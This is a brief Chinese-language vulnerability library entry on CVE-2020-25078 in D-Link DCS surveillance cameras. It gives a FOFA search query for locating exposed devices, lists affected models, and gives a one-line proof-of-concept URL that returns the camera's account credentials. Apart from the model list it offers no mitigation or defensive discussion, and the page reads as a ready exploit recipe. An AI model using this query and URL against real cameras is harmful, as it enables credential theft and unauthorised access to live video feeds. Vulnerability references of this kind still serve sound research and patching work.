D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078

D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面。

FOFA:

app="D_Link-DCS-2530L"

影响版本:

  • DCS-2530L
  • DCS-2670L
  • DCS-4603
  • DCS-4622
  • 等多个DCS系列系统

PoC:

http://xxx.xxx.xxx.xxx/config/getuser?index=0

ref:

https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg

Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""